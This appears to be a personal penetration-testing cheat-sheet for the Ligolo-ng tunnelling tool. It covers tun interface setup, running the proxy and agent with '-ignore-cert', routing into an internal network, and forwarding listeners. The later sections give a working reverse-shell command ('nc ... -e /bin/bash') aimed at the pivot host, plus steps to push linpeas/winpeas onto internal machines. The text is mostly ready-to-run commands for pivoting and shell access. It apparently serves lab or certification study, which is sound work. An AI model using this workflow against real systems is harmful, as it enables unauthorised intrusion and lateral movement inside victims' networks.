Ligolo-ng

https://github.com/nicocha30/ligolo-ng

Installation -

Using Kali Linux -

1. $ sudo ip tuntap add user [your_username] mode tun ligolo

2. $ sudo ip link set ligolo up

Grab the latest proxy and agents file from below link -

• make sure to download according to your target architecture -

• you can run "dpkg --print-architecture" in Linux to get the architecture

Releases · nicocha30/ligolo-ngGitHub

Running -

On attacker box

./proxy -selfcert

On target box

./agent.exe -connect <attacker ip>:11601 -ignore-cert

After that, we will receive the connection back in our attacker box, you can issue a help command to see various functionality the agent can perform.

Routing table -

On attacker box -

#  ligolo terminal

$ session                     - select the session you want to interact 

$ ifconfig                    - list all the available networks in the target box




# bash terminal

$ sudo ip route add 10.10.120.0/24 dev ligolo

$ ip route list                 - confirm if route is added

after that you can start a tunnel and interact with internal network

in the ligolo terminal -

$ session                      - list all the connected agents

$ start                        - select session and start tunnel

after this setup, you can start scanning the internal network.

Obtaining reverse shell of the internal host

what if we need to catch reverse shell coming from internal host, we cannot directly catch the shell as internal network cannot reach out to our attacker box, we will use ligolo agent box to forward our shell back to us.

let's assume we going to execute some type of rce in the internal box ,

# Intenal target box -

- let's say we are crafting payload, in that payload we need to put ligolo agent box ip address and port number.

$ nc 10.10.169.23 4444 -e /bin/bash             - here ip address should be ligolo agent box ip




# ligolo terimanl -

now we are going to add listener to forward the traffic to our box,

$ listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:1234

$ nc -lvp 1234                   - and we can get shell on port 1234

File Transfer -

let's say we need to transfer scripts to internal boxes like linpeas and winpeas.

# ligolo terminal - 

- we can add another listener to forward the traffic back to our attacker box,

$ listener_add --addr 0.0.0.0:7777 --to 127.0.0.1:8000

- now in internal box we can browse to port 7777 with ligolo agent box ip and it will redirect traffic back to attacker box.

- and we can start our python server in our attacker box on port 8000

$ python -m http.server